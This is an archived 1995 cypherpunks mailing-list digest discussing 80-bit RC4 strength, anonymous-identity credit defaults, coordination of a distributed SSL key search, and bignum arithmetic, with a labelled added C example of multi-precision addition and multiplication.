Content-Type: text/plain


On Thu, 31 Aug 1995, SINCLAIR DOUGLAS N wrote:
> 
> > The fact that the key is only 80 is *major* compromise.  I would 
> > recommend that package to no-one.   With only an 80 bit key you don't 
> > *need* trapdoors, granted they may be more "convenient" but the fact is 
> > the 80 key *can* [and certainly will] be broken...
> I disagree.  If we assume that RC4 and DES can be run at the same speed
> (I don't know how true this is) then 80 bit RC4 is 2^24 times harder
> to break than DES.  That's 16 million.  A machine that will crack
> DES in one day is of the order of one million dollars.  It would take
> 50,000 years to crack 80-bit RC4.  Alternatively, a one-day crack
> would cost 16 trillion dollars.  I feel safe with those numbers.
> 
> Certainly, for the most paranoid 128 bit IDEA is better than an
> 80 bit RC4.  However, to say that it is unsuitable for anyone is
> a vast stretch.  Considering it probably has a better user-interface
> than SecureDrive, it may be more suitable for the average person.
> 

I am a user of SecureDrive, and strongly support it.   There is *no* 
interface required, once you log into the drive, *everything* operates 
totally transparent to the user.

Always keep in mind that when the gov't doesn't mind the software being 
exported, they already know how to compromise it...Trust PGP, Hpack & 
SecureDrive...you won't be disappointed.

||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Thu, 31 Aug 95 01:26:04 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: "Citizen-Unit Identification" a Red Herring
In-Reply-To: <ac67e35c0e021004b325@[205.199.118.202]>
Message-ID: <199508310824.SAA17916@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com
  and tcmay@got.net (Timothy C. May)
  and consensus@consensus.com

Well, colour me clueless, but:

tcmay writes:
...
> Citizen-Unit ASCII Name: "Timothy Christopher May"
...
> Known Aliases: "Klaus! von Future Prime," "Lance," "Nick Szabo"
...

So T.C.May is the same person as "Lance"?


The medusa gets bigger every day...

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMEVxkixV6mvvBgf5AQF3mgP9EDa2O2kIAohjWYJH87F/3zp63rPlsraz
awE3Oabud184C+7oY1pZk1y7KloiXHcYeJNAvoHCBXMWMcFoO9Ds1Ca6iB4F49AX
SJnq+c7IwVae1f/Z58rdaMjXMTweJ3wSrSDZDadyMLHGC6921+z9J8f1pq+wB13c
6CPWlHGCINs=
=pmM9
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Thu, 31 Aug 95 16:32:13 PDT
To: cypherpunks@toad.com
Subject: A problem with anonymity
Message-ID: <9508312332.AA12214@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


I was thinking about some issues related to electronic commerce, and it
occurred to me that there is a significant problem in conducting
business with untraceable pseudonyms (anonyms?).  The problem occurred
to me while considering inheritance.

If one operates a business under an anonym (as opposed to the sort of
conditionally traceable pseudonym proposed by AT&T in "Anonymous Credit
Cards" <URL:ftp://ftp.research.att.com/dist/anoncc/anoncc.ps.Z>),
there's a strategy for transferring unlimited funds to one's
posterity.

Consider a business which typically has a lot of assets, but which are
offset by a lot of liabilities --- almost any sort of VAR will do, for
instance.  In your will, you leave the key to unlock a private message
to your heir, in which you hand over the information necessary to
assume your anonym.  Since the heir presumably has his own identity
(whether anonymous or not is immaterial, except to *his* heirs), and
the anonym can't be linked to you, he has no reason to care about
maintaining the reputation of the anonym.  In dismantling the anonym,
he sells its assets to his own identity at a fraction of their worth,
and defaults on the liabilities.

Since the anonym behaved reputably during its life, it developed what
would have been a credit-worthy reputation, had it been a (traceable)
pseudonym.  But, since there's nothing to link the anonym to its heirs
(or ancestors), the creditors of the anonym must eat the loss.

Since the process of taking an anonym from scratch to a positive
reputation would be reasonably short (presumably not too much longer
than taking a real name or pseudonym the same distance), especially when
helped along by being fed the profits from the legitimate business of
an ancestor anonym, it's likely that a single individual could pull off
such an asset transfer at least two or three times a decade, as well as
at inheritance time.

A market which permits anonyms to have credit based on reputation will
probably have a constant stream of defaults caused by such behavior,
representing a significant risk factor in extending credit to anonyms
which can't be predicted by reputation.

Comments?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Thu, 31 Aug 95 01:52:12 PDT
To: tibbs@sina.hpc.uh.edu (Jason L Tibbitts III)
Subject: Re: A glance at the future of missing child identification
In-Reply-To: <9508290348.AA14292@hpc.uh.edu>
Message-ID: <199508310851.SAA17944@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello tibbs@sina.hpc.uh.edu (Jason L Tibbitts III)
  and cypherpunks@toad.com
  and tcmay@got.net (Timothy C. May)

...[about transponders for humans]...
> Believe it or not, something like this is being used (or is being prepared
> for use) in breast implants.  An article in the Houston (silicone city)
...

Is this what they call topic drift?

> Subject: Re: A glance at the future of missing child identification

I can just see the parents getting their young daughters into this system.

Boys, of course, can look after themselves. Sure.
(Or do you envision young boys with breast implants?)


ObCrypto:

So, if they manage to make it more appropriate for both young girls and
for boys, are there any counterarguments? (Not for c'punks, for general
population: "missing children" will be hard to argue against.)

  * privacy (worth a try, anyhow)

  * use of the info by the bad guys (the mythical "pretty girl radar" :-)

  * "witness/victim protection" could be made harder by this

  * alternative: the transponder password could be shared secret between
the parents and the state (what combination here?); protects both against 
perverted state and perverted parents...


OK, what have I missed?

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMEV3+yxV6mvvBgf5AQEIZAP9HHwlBOjyAjY8v5sQhvHywAXFhiPUuiI2
iPqEyDJ+GB4ZepDJsgzLaroxcEf/Gh72bgi6K8rk3EpqdErDePXa21Egy9Fw9tkm
eFMY+YAOBLUO0C2thprTthVhlY194czoWuqvB2LXKwUyfV5w1CmvK0qQoO5+IVpL
ZUuCIsjKssw=
=qZnM
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Thu, 31 Aug 95 02:27:56 PDT
To: sjb@austin.ibm.com (Scott Brickner)
Subject: Re: SSL search attacks
In-Reply-To: <9508300101.AA11637@ozymandias.austin.ibm.com>
Message-ID: <199508310926.TAA18041@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello don@cs.byu.edu
  and cypherpunks@toad.com
  and Scott Brickner <sjb@austin.ibm.com>

Scott wrote:
> don@cs.byu.edu writes
> >From: Scott Brickner <sjb@austin.ibm.com>

...[only server assigns segments, client may ack only assigned segments]...

> >BEAAAT STATE! Push 'em back.. WAAAAAAY BAAAACK. 
> >(relevant comments follow)
> 
...
> *coordinated* attack on the key.  We've established that there is a 1/e
> cost factor in removing the central server.  I just threw out these
...

Wouldn't it be possible to reduce the cost?

Each client could pick a segment at random, check it and then broadcast
a NAK. Other clients would then know that the segment in question has
been done, and avoid picking it in the future. If you are worried about
collisions, one could also have IGRAB, which would advise others that
someone is working on a segment (you can still collide, but not so
often).

One advantage is that it is not necessary to have a central infinitely
trusted server. (Nothing personal, but bogus server is an attack.)

NAKs and IGRABs would be weighted by the trust accorded to the entity
that originated them.

Notes:
  * "broadcast" is probably best done with a fairly sparse graph, otherwise
one will get too much communications.
  * since there is no "server", I should replace "client" with another word.
  * there is no incentive to send NAKs (they diminish your own chance
of hitting the jackpot). How could this be avoided?
  * the NAKs could be sent by e-mail, thus allowing badly connected
and/or anonymous entities to participate.


Am I making any sense at all?

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMEWAKixV6mvvBgf5AQEnkQQA0/+19hwKS204HjinHiLH5atzrv4CQu4G
Gtpxoq4R+VQgVmsUdYjPsUXce3Cu8KlFuRuJwjhnRuqQxUs53uVkKxo/peoV8xZr
FNguipHzgVu7T9t/hNQwiUDIudkv9mCpP4V27CU31GIt3BpzmfiCJLryFjI0kqKe
PXAB0khlKvY=
=pbWn
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 31 Aug 95 19:24:12 PDT
To: cypherpunks@toad.com
Subject: Re: A problem with anonymity
Message-ID: <ac6bbc24060210043553@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:06 AM 9/1/95, Mac Norton wrote:
>On Thu, 31 Aug 1995, Timothy C. May wrote:
>
>> You don't have to look to death and inheritance for this problem to crop
>> up. Similar situations arise when:
>
>But these are problems of fraud that the criminal and civil
>justice systems already comprehend.  I think what is posited
>is something a bit more unique.

The guy who takes in money and vanishes, or skips to Rio, out of the reach
of extradition treaties, is not all that different from the posited
situation of a nym dematerializing.

The "law" can't really touch either situation, efficiently, and so other
mechanisms are generally used (or recommended, though many con victims have
failed to do so).

I've not claimed the scenarios are identical, only that the issue of agents
taking in money or promising services and then vanishing is as old as
history. That such things will happen with digital pseudonyms is assured.
Fortunately, countermeasures appear practical.

...
>> - this is also a well-known problem with any services that handle money,
>> valuables, etc. For example, the money courier who vanishes to Rio de
>> Janeiro.
>
>I don't think bonding is applicable in this posit, given the
>assumed established creditworthiness of the original anonym.
>Perhaps he originally posted a bond, but the market would
>probably have dispensed with that condition as an unnecessary
>formality at some point in his glowing credit history.
>
>MacN

If the "market" (actually, some players in the market) chose to dispense
with bonding and then got burned, so be it. Later iterations of the market,
and the players, will thus likely _not_ dispense with bonding and other
such measures.

Think of it as evolution in action.

--Tim May

(P.S. Could people try not to include all of the post they are responding
to in their replies?)

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Thu, 31 Aug 95 20:44:44 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: SSL search attack
Message-ID: <8B034A5.00030003CF.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


D > >  The odds can be improved somewhat by scaling the granularity of the
D > >sweep to the size of the sweep. (Align larger chunks on large-chunk
D > >boundaries, eliminating the chance of overlap with other large chunks.)
D >
D > Some kind of step (ie, round-down) function performed on the random (I

  More like deciding ahead of time that if you are going to take 1/n of
the keyspace, you should take a chunk aligned on a 1/n boundary. That
way, you don't have two people take chunks right next to each other,
just missing the key, or take chunks that overlap each other massively,
duplicating effort.

  If a random protocol were to be used, each person would roll up an
appropriate starting spot, and then simply search sequentially
thereafter, so that he would not double up on his =own= previous
efforts. The point of scaling the starting point is basically the theory
that says:

     "I will generate a random number of the form xxxxxx0000, because if
     I trust that a person has scanned any given number, I also trust
     that he has scanned the next FFFF keys, so it would be
     counterproductive for me to start anywhere not so aligned."

  And the number of 0s is based on my pathetic amount of computing power
being estimated as 2**(-24) of the total effort. For those who made the
Big Boys list, a few more zeros are in order.

D > is searching an X segment area around where the dart hit. In order to
D > get any kind of boundary, you have to scale the allowed segment blocks, by
D > powers of two, for example, or something, so everyone knows where the
D > borders are. It's a nice thought but I don't see that it's necessary.

  It should improve the odds just a bit. Instead of throwing darts at
2**40 targets, we are only throwing them at 2**24 small ones, and people
with large darts to throw can worry about, say, 2**16 or even 2**12
targets to hit.



 * You always carry weapons, 'cause you always carry cash.
   -Glenn Frey.
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Thu, 31 Aug 95 17:21:38 PDT
To: starrd@iia2.org (starrd)
Subject: Re: opinions on RSA Secure?
In-Reply-To: <Pine.BSD.3.91.950831154639.27318A-100000@usr4.primenet.com>
Message-ID: <95Aug31.202112edt.1621@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> The fact that the key is only 80 is *major* compromise.  I would 
> recommend that package to no-one.   With only an 80 bit key you don't 
> *need* trapdoors, granted they may be more "convenient" but the fact is 
> the 80 key *can* [and certainly will] be broken...
I disagree.  If we assume that RC4 and DES can be run at the same speed
(I don't know how true this is) then 80 bit RC4 is 2^24 times harder
to break than DES.  That's 16 million.  A machine that will crack
DES in one day is of the order of one million dollars.  It would take
50,000 years to crack 80-bit RC4.  Alternatively, a one-day crack
would cost 16 trillion dollars.  I feel safe with those numbers.

Certainly, for the most paranoid 128 bit IDEA is better than an
80 bit RC4.  However, to say that it is unsuitable for anyone is
a vast stretch.  Considering it probably has a better user-interface
than SecureDrive, it may be more suitable for the average person.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Thu, 31 Aug 95 18:58:29 PDT
To: Scott Brickner <sjb@austin.ibm.com>
Subject: Re: A problem with anonymity
In-Reply-To: <9508312332.AA12214@ozymandias.austin.ibm.com>
Message-ID: <Pine.SOL.3.91.950831205514.25138D-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


1.  Anonymity raises the price of credit; the market will
	decide, probably variously, how that increase will
	be distributed among borrowers.

2.  I suspect the taxation authorities would have an interest
	and that it would be counter-anonymity, producing
	friction that would further increase the above cost.

MacN

On Thu, 31 Aug 1995, Scott Brickner wrote:

> I was thinking about some issues related to electronic commerce, and it
> occurred to me that there is a significant problem in conducting
> business with untraceable pseudonyms (anonyms?).  The problem occurred
> to me while considering inheritance.
> 
> If one operates a business under an anonym (as opposed to the sort of
> conditionally traceable pseudonym proposed by AT&T in "Anonymous Credit
> Cards" <URL:ftp://ftp.research.att.com/dist/anoncc/anoncc.ps.Z>),
> there's a strategy for transferring unlimited funds to one's
> posterity.
> 
> Consider a business which typically has a lot of assets, but which are
> offset by a lot of liabilities --- almost any sort of VAR will do, for
> instance.  In your will, you leave the key to unlock a private message
> to your heir, in which you hand over the information necessary to
> assume your anonym.  Since the heir presumably has his own identity
> (whether anonymous or not is immaterial, except to *his* heirs), and
> the anonym can't be linked to you, he has no reason to care about
> maintaining the reputation of the anonym.  In dismantling the anonym,
> he sells its assets to his own identity at a fraction of their worth,
> and defaults on the liabilities.
> 
> Since the anonym behaved reputably during its life, it developed what
> would have been a credit-worthy reputation, had it been a (traceable)
> pseudonym.  But, since there's nothing to link the anonym to its heirs
> (or ancestors), the creditors of the anonym must eat the loss.
> 
> Since the process of taking an anonym from scratch to a positive
> reputation would be reasonably short (presumably not too much longer
> than taking a real name or pseudonym the same distance), especially when
> helped along by being fed the profits from the legitimate business of
> an ancestor anonym, it's likely that a single individual could pull off
> such an asset transfer at least two or three times a decade, as well as
> at inheritance time.
> 
> A market which permits anonyms to have credit based on reputation will
> probably have a constant stream of defaults caused by such behavior,
> representing a significant risk factor in extending credit to anonyms
> which can't be predicted by reputation.
> 
> Comments?
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Thu, 31 Aug 95 19:06:18 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: A problem with anonymity
In-Reply-To: <ac6b9e29040210042a10@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.950831210010.25138E-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 31 Aug 1995, Timothy C. May wrote:

> You don't have to look to death and inheritance for this problem to crop
> up. Similar situations arise when:

But these are problems of fraud that the criminal and civil
justice systems already comprehend.  I think what is posited
is something a bit more unique.

> 
> - a pseudonym simply decides to dissolve the current pseudonym and shift
> focus to another pseudonym (perhaps transferring a bunch of assets, then
> simply vanishing and leaving "no forwarding address")
> 
> (This is of course the basis of any number of scams and "boiler room
> operations." Crypto does not completely eliminate scams like this, and, in
> fact, generates some new kinds of scams.)
> 
> - this is also a well-known problem with any services that handle money,
> valuables, etc. For example, the money courier who vanishes to Rio de
> Janeiro.

I don't think bonding is applicable in this posit, given the 
assumed established creditworthiness of the original anonym.
Perhaps he originally posted a bond, but the market would 
probably have dispensed with that condition as an unnecessary
formality at some point in his glowing credit history.

MacN
> 
> This is one thing that _bonding_ is designed to partially ameliorate. One
> posts a bond which is greater than the amount being carried, or at least is
> some large amount. (Calculations are complex, and various agencies may have
> various policies, depending on other reputation factors.)
> 
> 
> >Since the anonym behaved reputably during its life, it developed what
> >would have been a credit-worthy reputation, had it been a (traceable)
> >pseudonym.  But, since there's nothing to link the anonym to its heirs
> >(or ancestors), the creditors of the anonym must eat the loss.
> 
> The concept of "reputation capital" is a critical one.
> 
> Ideally, one never "trusts" an agent with a transaction greater than the
> value of the reputation capital he will lose if he defaults.
> 
> There are still scams and maneuvers to thwart this reputation capital
> scheme. The agent planning to "defect" (default, split, abscond, renege,
> etc.) can try to pile up as many pending transactions as possible,
> anticipating that the various transactees will be unaware of each other.
> (This of course happens in real life.)
> 
> Whether cryptographic protocols (cf. the "encrypted open books" proposal by
> Eric Hughes for one approach which may be useful) solve this problem is not
> known at this time. But the non-crypto world has of course not solved this
> problem, either.
> 
> ...
> >A market which permits anonyms to have credit based on reputation will
> >probably have a constant stream of defaults caused by such behavior,
> >representing a significant risk factor in extending credit to anonyms
> >which can't be predicted by reputation.
> >
> >Comments?
> 
> Lots of issues need to be thought about. My hunch is that economists, game
> theorists, and scam artists will all discover digital money and pseudonyms
> and will explore various aspects of this situation.
> 
> I devoted a pretty big chunk of my Cyphernomicon to these "darker sides" of
> anonymity, of reputation capital, and suchlike. By no means did I cover all
> the issues of "crypto anarchy," but I suggest interested folks take a look
> at the chapter on crypto anarchy for more discussion.
> 
> --Tim May
> 
> 
> 
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: will@thinkmedia.com (thinkmedia.com)
Date: Thu, 31 Aug 95 22:27:17 PDT
To: cypherpunks@toad.com
Subject: cypherpunks lite?
Message-ID: <199509010527.WAA12666@scruz.net>
MIME-Version: 1.0
Content-Type: text/plain


Can someone provide me with the address of cypherpunks lite?

Thanks.

-Will S. Johnston
______________________________________________________________________________
Opinion is a flitting thing,                         Real Time Media
But Truth, outlasts the Sun--                        Thinking Media Research
If then we cannot own them both--                    will@thinkmedia.com
Possess the oldest one--                             (408) 423-3720
             -Emily Dickinson                        http://www.thinkmedia.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Thu, 31 Aug 95 20:20:28 PDT
To: scmayo@rschp1.anu.edu.au (Sherry Mayo)
Subject: Re: sums with BIG numbers
In-Reply-To: <9509010227.AA28294@toad.com>
Message-ID: <199509010320.XAA07735@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



> Can anyone point me to any books, documentation or
> whatever that will explain the methods used in routines
> like bignum for doing sums with 'too-big' numbers.
> 
> I'm having a tough time trying to figure it out from the code 
> ;-(
> 
> Sherry
> 
What do you mean? How big numbers are added (trivially easier than multiplication
or division) or how it handles numbers that are too large for the variable's
size?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 31 Aug 95 20:28:32 PDT
To: scmayo@rschp1.anu.edu.au (Sherry Mayo)
Subject: Re: sums with BIG numbers
In-Reply-To: <9509010227.AA28294@toad.com>
Message-ID: <199509010327.XAA25211@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Can anyone point me to any books, documentation or
> whatever that will explain the methods used in routines
> like bignum for doing sums with 'too-big' numbers.


Try Knuth's The Art of Computer Programming, Volume 2, Seminumerical 
Algorithms.

Most bignum routines work like this. An integer is represented
as a polynomial p(x) with coefficients a_0, a_1, ..., a_n, where
x is the radix or "base" of the number. The coefficients come from
the ring of integers, modulo the base. For instance, if you are
using base-2 (x=2), the number 28 could be represented as
p(x) = a_4 x^4 + a_3 x^3 + a_2 x^2 + a_1 x + a_0 

where a_4=a_3=a_2=1 and a_1=a_0=0.  Each a_n is an element of Z mod x

To add two bignums, P(x) and Q(x) simply sum coefficients of like
terms like you would with any polynomial addition, with one simple
modification. If a_k is the coefficient of the x^k term of P(x), and
b_k is the coefficient of the x^k term of Q(x), then the
x^k term of P(x)+Q(x) is a_k+b_k+(carry of previous term) mod x.
(new carry=(a_k+b_k + previous carry)/x)
All this says is, the new term is the sum of the coefficients 
on the x^k terms, modulo x (because your coefficients can not hold
numbers larger than 'x'), plus the carry of the last term. The
carry is 1 if a_k+b_k+previous_carry > x. 

Now you may ask, if our coefficients in our bignum are stored as
32-bit integers, how do I compute the result in C and take into
account overflow?

Well, add the two numbers together. If the result is less than either
of the numbers, an overflow has occurred and you must carry (the
machine register has 'rolled over'). For multiplication, you can
either break a 32-bit number into 2 16-bit chunks and perform 4 16-bit
multiplies to get a 64-bit result (using 16x16->32 bit hardware
multiplication) or you can use a number of type "long long int" in C
and let the compiler do it for you.


A short example: let X=123 and Y=789 be bignums represented via the
polynomials P(x)=1 x^2 + 2 x + 3 and Q(x)=7 x^2 + 8 x + 9  with
x=10. let r_n be the coefficients of the resultant polynomial 
R(x)=P(x)+Q(x)

Start at the least significant term. Carry=0
Now r_0=(a_0 + b_0)+carry mod x, or r_0=9+3 mod 10=2, carry=(9+3)/10=1
    r_1=8 + 2 + carry = 11 mod 10 = 1    carry=11/10 = 1 
    r_2=1+7 + carry = 9  carry = 9 / 10 = 0
    
So the result is 912.
  
Explicit modulos are only required if you are working in some base
other than the machine's natural word size. (otherwise the
'roll over' effect gives you the mod for free)

If you are seeking the fastest practical methods of doing multiplication,
division, and modular exponentiation, look up information on 
Karatsuba multiplication, fast reciprocals via Newton's Method,
and Fast Integer Squaring combined with exponent shifting.
(if you are looking at PGP's source code, PGP does not use the
fastest algorithms)

-Ray
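
An added example (not part of Ray's message, and not code from PGP or any bignum library): a C version of the addition and the 16-bit-chunk multiplication described above. The function names and the least-significant-digit-first layout are assumptions of this example; `bn_add` tests for wraparound after each of its two additions so that a carry coming in from the previous limb is also caught.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* All numbers are arrays of "digits", least significant digit first. */

/* Explicit-radix addition (the base-10 walk-through): r = a + b.
 * Assumes every digit is < base and base <= 2^31, so the column sum
 * a[i] + b[i] + carry cannot wrap. Returns the carry out of the top digit. */
uint32_t bn_add_radix(uint32_t *r, const uint32_t *a, const uint32_t *b,
                      size_t n, uint32_t base)
{
    uint32_t carry = 0;
    for (size_t i = 0; i < n; i++) {
        uint32_t s = a[i] + b[i] + carry;
        r[i] = s % base;    /* digit that stays in this column */
        carry = s / base;   /* 0 or 1, moves to the next column */
    }
    return carry;
}

/* Radix 2^32 addition: the register wraparound supplies the "mod x".
 * Each limb is added in two steps, with a wraparound test after each,
 * because adding the incoming carry can itself wrap (s == 0xFFFFFFFF). */
uint32_t bn_add(uint32_t *r, const uint32_t *a, const uint32_t *b, size_t n)
{
    uint32_t carry = 0;
    for (size_t i = 0; i < n; i++) {
        uint32_t s  = a[i] + b[i];   /* wraps mod 2^32 */
        uint32_t c1 = (s < a[i]);    /* wrapped iff sum is below an operand */
        uint32_t t  = s + carry;
        uint32_t c2 = (t < s);       /* wrapped while adding the carry */
        r[i] = t;
        carry = c1 | c2;             /* the two cases are mutually exclusive */
    }
    return carry;
}

/* 32x32 -> 64 bit product built from four 16x16 -> 32 bit multiplies.
 * The result is returned as two 32-bit words, hi:lo. */
void mul32_split(uint32_t a, uint32_t b, uint32_t *hi, uint32_t *lo)
{
    uint32_t al = a & 0xFFFFu, ah = a >> 16;
    uint32_t bl = b & 0xFFFFu, bh = b >> 16;
    uint32_t ll = al * bl;           /* weight 2^0  */
    uint32_t lh = al * bh;           /* weight 2^16 */
    uint32_t hl = ah * bl;           /* weight 2^16 */
    uint32_t hh = ah * bh;           /* weight 2^32 */
    /* Column for bits 16..31: three 16-bit values, so the sum fits easily. */
    uint32_t mid = (ll >> 16) + (lh & 0xFFFFu) + (hl & 0xFFFFu);
    *lo = (ll & 0xFFFFu) | (mid << 16);
    *hi = hh + (lh >> 16) + (hl >> 16) + (mid >> 16);
}

/* The same product using a 64-bit type and letting the compiler do the work. */
uint64_t mul32_wide(uint32_t a, uint32_t b)
{
    return (uint64_t)a * b;
}

int main(void)
{
    /* 123 + 789 in base 10, digits least significant first */
    uint32_t x[3] = {3, 2, 1}, y[3] = {9, 8, 7}, r[3];
    uint32_t c = bn_add_radix(r, x, y, 3, 10);
    printf("123 + 789 = %u%u%u (carry out %u)\n",
           (unsigned)r[2], (unsigned)r[1], (unsigned)r[0], (unsigned)c);

    /* Constructed input: the carry into limb 1 makes its sum land back on a[1] */
    uint32_t a[2] = {0xFFFFFFFFu, 5u}, b[2] = {1u, 0xFFFFFFFFu}, s[2];
    c = bn_add(s, a, b, 2);
    printf("limbs: %08x %08x (carry out %u)\n",
           (unsigned)s[1], (unsigned)s[0], (unsigned)c);

    uint32_t hi, lo;
    mul32_split(0xFFFFFFFFu, 0xFFFFFFFFu, &hi, &lo);
    printf("split: %08x%08x  wide: %016llx\n", (unsigned)hi, (unsigned)lo,
           (unsigned long long)mul32_wide(0xFFFFFFFFu, 0xFFFFFFFFu));
    return 0;
}
```
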




  



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Thu, 31 Aug 95 20:27:48 PDT
To: sinclai@ecf.toronto.edu (SINCLAIR  DOUGLAS N)
Subject: Re: opinions on RSA Secure?
In-Reply-To: <95Aug31.202112edt.1621@cannon.ecf.toronto.edu>
Message-ID: <199509010328.XAA07922@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


[..]
> 
> Certainly, for the most paranoid 128 bit IDEA is better than an
> 80 bit RC4.  However, to say that it is unsuitable for anyone is
> a vast stretch.  Considering it probably has a better user-interface
> than SecureDrive, it may be more suitable for the average person.
> 
So why not a user-friendly Windows or GUI interface for SecureDrive as well?

How hard is it to adapt LOGIN for Windows?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sjb@austin.ibm.com (Sjb@austin.ibm.com)
Date: Wed, 20 Sep 95 16:29:25 PDT
To: cypherpunks@toad.com
Subject: A problem with anonymity
Message-ID: <9509201546465435@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Thu, 31 Aug 1995 18:32:01 -0500
From: Scott Brickner <sjb@austin.ibm.com>

I was thinking about some issues related to electronic commerce, and it
occurred to me that there is a significant problem in conducting
business with untraceable pseudonyms (anonyms?).  The problem occurred
to me while considering inheritance.

If one operates a business under an anonym (as opposed to the sort of
conditionally traceable pseudonym proposed by AT&T in "Anonymous Credit
Cards" <URL:ftp://ftp.research.att.com/dist/anoncc/anoncc.ps.Z>),
there's a strategy for transferring unlimited funds to one's
posterity.

Consider a business which typically has a lot of assets, but which are
offset by a lot of liabilities --- almost any sort of VAR will do, for
instance.  In your will, you leave the key to unlock a private message
to your heir, in which you hand over the information necessary to
assume your anonym.  Since the heir presumably has his own identity
(whether anonymous or not is immaterial, except to *his* heirs), and
the anonym can't be linked to you, he has no reason to care about
maintaining the reputation of the anonym.  In dismantling the anonym,
he sells its assets to his own identity at a fraction of their worth,
and defaults on the liabilities.

Since the anonym behaved reputably during its life, it developed what
would have been a credit-worthy reputation, had it been a (traceable)
pseudonym.  But, since there's nothing to link the anonym to its heirs
(or ancestors), the creditors of the anonym must eat the loss.

Since the process of taking an anonym from scratch to a positive
reputation would be reasonably short (presumably not too much longer
than taking a real name or pseudonym the same distance), especially when
helped along by being fed the profits from the legitimate business of
an ancestor anonym, it's likely that a single individual could pull off
such an asset transfer at least two or three times a decade, as well as
at inheritance time.

A market which permits anonyms to have credit based on reputation will
probably have a constant stream of defaults caused by such behavior,
representing a significant risk factor in extending credit to anonyms
which can't be predicted by reputation.

Comments?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Thu, 31 Aug 95 20:31:14 PDT
To: cypherpunks@toad.com
Subject: LuRaSHA vaporware...
